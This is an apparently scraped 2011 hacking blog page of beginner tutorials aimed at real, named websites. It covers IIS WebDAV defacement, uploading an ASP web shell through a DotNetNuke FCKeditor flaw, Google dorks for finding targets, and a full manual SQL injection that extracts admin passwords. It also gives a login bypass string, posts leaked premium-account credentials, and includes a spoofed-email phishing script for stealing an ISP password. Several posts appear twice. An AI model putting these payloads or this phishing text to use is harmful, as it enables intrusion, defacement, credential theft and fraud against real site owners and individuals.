xss hacking
Posted by
ENJOY NEW TECHNOLOGY
Wednesday, June 29, 2011
How to Hack Website with IIS Exploit. [Tutorial] (For Window Xp)
Posted by
ENJOY NEW TECHNOLOGY
In IIS Exploit we can upload the Defaced page on the Vulnerable Server without any Login. It is most Easiest way to Hack any site.
STEP 1: Click on Start button and open "RUN".
STEP 2: Now Type this in RUN
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
STEP 3: Now "Right-Click" in the folder and Goto "New" and then "Web Folder".
STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".
STEP 5: Now Click on "Finish"
STEP 6: Now the folder will appear. You can open it and put any deface page or anything.
STEP 7: I put text file in that folder. Named "securityalert.txt" (you can put a shell or HTML file also). If the file appear in the folder then the Hack is successful but if it don't then the site is not Vulnerable.
.
Now to view the uploaded site i will go to "http://autoqingdao.com/securityalert.txt"In your case it will be " www.[sitename].com/[file name that you uploaded]
"
DNN method Complete Tutorial How to hack a Web site with Asp shell
Posted by
ENJOY NEW TECHNOLOGY
Download this Shell
Step 1 :
http://www.google.com
Step 2:Now enter this dork (this is Dork for find DNN Valn sites)
inurl:/Fck/fcklinkgallery.aspx
this is a dork to find the Portal Vulnerable sites, use it wisely.
Step 3:
it will show you many sites, Copy any one of site.
Step 4:
For example take this site.
Example:
http://www.itservicespro.net
Step 5: Now Paste after the site url
this
so Site is this :
http://itservicespro.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
so it will look like this (screenshot below)
Note: if it will show you like this (see screenshot below) its mean site could not hack find another site
Now Click on File ( A File On Your Site )
Step 8:Now replace the URL in the address bar with a Simple Script
Step 10:
Select Root
Step 11:
Upload your shell ASp Download it here
After upload
go for your shell www.yoursite.com/portals/0/yourshellname.asp;.jpg
EXample : http://www.itservicespro.net/portals/0/umer.asp;.jpg
so you upload shell and shell is front of you look like this (screenshot below)
Click on <Dir>... again and again till you will see admin
so when it will show you this page admin area page click on UPLOAD FILE TO C:\WEBSITES\WWW.ITSERVICESPRO.NET\WEBSITE\
and upload your deface index page so
this is your result www.site.com/urpagename.html
for example see this http://www.itservicespro.net/umer.html
http://www.google.com
Step 2:Now enter this dork (this is Dork for find DNN Valn sites)
:inurl:/tabid/36/language/en-US/Default.aspx
orinurl:/Fck/fcklinkgallery.aspx
Step 3:
it will show you many sites, Copy any one of site.
Step 4:
For example take this site.
Example:
http://www.itservicespro.net
Step 5: Now Paste after the site url
this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
so Site is this :
http://itservicespro.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
so it will look like this (screenshot below)
Now Click on File ( A File On Your Site )
Step 8:Now replace the URL in the address bar with a Simple Script
javascript:__doPostBack('ctlURL$cmdUpload','')
Step 9:You will Find the Upload OptionStep 10:
Select Root
Step 11:
Upload your shell ASp Download it here
After upload
go for your shell www.yoursite.com/portals/0/yourshellname.asp;.jpg
EXample : http://www.itservicespro.net/portals/0/umer.asp;.jpg
so you upload shell and shell is front of you look like this (screenshot below)
Click on <Dir>... again and again till you will see admin
and upload your deface index page so
this is your result www.site.com/urpagename.html
for example see this http://www.itservicespro.net/umer.html
a
If you want to deface main page then click on Admin dir and search for index htm or html and click on Edit and copy your deface page code and replace there...:)
FOR EDUCATIONAL PURPOSE ONL
Y
Y
How to Hack Web Site Sql Injection manually Full Detailed Tutorial
Posted by
ENJOY NEW TECHNOLOGY
SQL Injection: is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. (wikipedia definition)
What will I need to perform an SQL Injectionattack?
[+] exploit scanner/Google
[+] a good list of "google dorks"
[+] admin finder (Use Havij)
[+] half a brain and the will to learn lol 
THE LIST OF GOOGLE DORKS ARE HERE:
Example i take this Dork
Code:
inurl:index.php?id=
paste this dork on google. google will show you much sites copy any one
Code:
sqlivulnerablesite.com/index.php?id=1'
*NOTE* With this exploit scanner it auto-quotes all the urls.
Lets say for instance you found a site that might be vulnerable (or what you think maybe a vulnerable site). If a error on the web page comes up something like this.
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Then its vulnerable to sql injection. The first step to this multi-step systematic attack on the sql databases is to found out the number of columns there is in the sql database. To found this out we use this code injection in the address bar after the website url. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 1--
Load the page. If the page loads correctly with that code injection in the url then we are on the right track
Knowing that there is already 1 column in this database we do another code injection. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 2--
If the page loads correctly again then this attack can still be performed.
Usually if the pages loads correctly after trying the #2 then I try stepping the number up to around 10.
*NOTE* If you load the web page on a code injection like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 10--
and you get a result like this.
Code:
Unknown column '10' in 'order clause'
Then you must go down a number until you reach the number of columns that is in the database where it allows the web page to load correctly without any errors on the web page. For instance since the error on the web page said "unknown column '10'" we must go down to the number 9. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 9--
If your page loads correctly then this means there is 9 columns in the database
The next step in this attack is to find out what column is vulnerable to our attack. We use this code injection in your address bar after the vulnerable site. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9--
After you have loaded the page it should show which columns are vulnerable. Usually shows about 2-3 columns. I personally use the the lowest number that is vulnerable. For instance "2". Lets say the vulnerable column in the database is "2". The next code injection we use is to found out the version of the database. Like This.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,@@version,3,4,5,6,7,8,9
When the web page is loaded, where the number "2" was on the web page there should be in place of it the "database version". It is best if you a beginner to make sure the database version is 5.0 on higher like 5.0.17. Anything below 5.0 you are going to be required to brute force each of the tables for information. So now that we have the database version which is "5.0.17", we must now find the table names with this code injection at the top in your address bar.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--
After the page is loaded it should have all the table names on the web page. The table name that your going to want to find is admins. Once you have found admins or something that is similar to that, then we do another code injection to found out that columns which are in that table with this code.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--
*NOTE* Here (x) is the ascii value of the table name.
Now we must find the ascii value of the word admins.
The ascii value of admins is
Code:
& #97 ; & #100 ; & #109 ; & #105 ; & #110; & #115 ;
Delete all the ";" , "#" , and "&". So it should look like this.
Code:
97,100,109,105,110,115
Now replace the the "x" with that ascii number code. Now your new code injection should look something like this. Enter it in your url address bar.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110,115)--
When the page loads you should get something like/similar to username and password on the web page. To get the data from that column you must use a code injection like this.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --
*NOTE* (0x3a) is the ascii value of the column name
When the page loads it should show the data of the username and password for cpanel access.
Now to access the cpanel we must find the login page. I provided a admin finder.exe in the .rar. Open it up and type in the url of your vulnerable site. From there it scan till it finds the login page for admin cpanel access. Which can lead to defacement and web server compromise.
Hopefully someone found this thread useful/helpful. I take full credit in writing this tutorial out. PM me if you need any further help with your sql injections!
How to Hack Web Site with Havj Complete Detailed Tut
Posted by
ENJOY NEW TECHNOLOGY
1st Of All Download this things you will need that things
SQl Dork List
Havj Pro
So Step 1 Open Dork List and copy any dork and paste it on google.com
Google will show you much sites copy any any one of site
After a minute it will show you a green line in last box (Target is Valnurable) its mean you can hack this site Easily, (Note if there will type in red line that target is not valn its mean you cant hack that site, find another)
Now thats it it will show you password and username
now a probleb is that where is admin Login
thats it guyz enjoy if you have problem you can email me or comment here
How To Hack Site with Simple Sql Injection Detailed Tutorial+Video
Posted by
ENJOY NEW TECHNOLOGY
or Learn Tutorial by read Text belowNow Google will show you alot of Web sites, check any one,For Example i have a site, www.abhai.org.in,Now we have 2 Problems 1 is find admin 2nd is Hack Admin panelsolution of problem no 1 admin find:step 1: download this tool click here to downloadnow open Havj and Click on Find Admin
Enter Site url in box and click on Start
it will show you admin login after a minute open url
so we got, www.abhai.org.in/admin
Now download Sql querioes
sql quesries list download by click here
Now go to Admin login
and in username box type "admin" (without "" quotes)
and in password box also type admin and check if login not success then type 1'or'1'='1
so user : admin
passowrd admin
or
password : 1'or'1'='1
or login success
thats it guyzz mostly Sites hacked by this method must check my other Tutorial about sql different metho
d
or Learn Tutorial by read Text below
Now Google will show you alot of Web sites, check any one,
For Example i have a site, www.abhai.org.in,
Now we have 2 Problems 1 is find admin 2nd is Hack Admin panel
solution of problem no 1 admin find:
step 1: download this tool click here to download
now open Havj and Click on Find AdminEnter Site url in box and click on Start
so we got, www.abhai.org.in/admin
Now download Sql querioes
sql quesries list download by click here
Now go to Admin login
and in username box type "admin" (without "" quotes)
and in password box also type admin and check if login not success then type 1'or'1'='1
so user : admin
passowrd admin
or
password : 1'or'1'='1
or login success
thats it guyzz mostly Sites hacked by this method must check my other Tutorial about sql different metho
d
Make Mozilla 10x Times Faster
Posted by
ENJOY NEW TECHNOLOGY
THIS IS A VERY simple TRICK.....NOSOFTWARE REQUIRED......NO DLL REQUIRED
NOTE:this trick only works for broadband users not for dialup
NOTE:this trick only works for broadband users not for dialup
Friday, May 13, 2011
File Sonic premium account
Posted by
ENJOY NEW TECHNOLOGY
File Sonic premium account working
Login: hrnybttm
Password: 325122
working when i post it!
Password: 325122
working when i post it!
Get someones ISP password
Posted by
ENJOY NEW TECHNOLOGY
How to Get someones ISP password, Get free internet
1.) run your telnet program:
on windows , go to START -> RUN -> "TELNET".on linux , you should open a shell , and write telnet.
2.) then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the program (port "25")!
3.) now , write the following :
mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
data
Hi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.
but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of for each our you use!
- - - - - - - - - - - - - -
To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".
note: No moeny will be returned if you don't follow our instructions!
thank you,
the support team!
4.) press enter twice and then write "."(without the "") and press ENTER!
--
now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .
[**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?
[**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".
[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".
[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..
* launch your WWW browser(MICROSOFT \NETSCAPE) , and type "HTTP://www.galaxycorp.com".
* Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)
* and when they ask for your email , type your Real one!!!
now continue in your normal life , and remember to read your email!
if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!
on windows , go to START -> RUN -> "TELNET".on linux , you should open a shell , and write telnet.
2.) then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the program (port "25")!
3.) now , write the following :
mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
data
Hi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.
but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of for each our you use!
- - - - - - - - - - - - - -
To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".
note: No moeny will be returned if you don't follow our instructions!
thank you,
the support team!
4.) press enter twice and then write "."(without the "") and press ENTER!
--
now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .
[**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?
[**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".
[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".
[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..
* launch your WWW browser(MICROSOFT \NETSCAPE) , and type "HTTP://www.galaxycorp.com".
* Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)
* and when they ask for your email , type your Real one!!!
now continue in your normal life , and remember to read your email!
if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!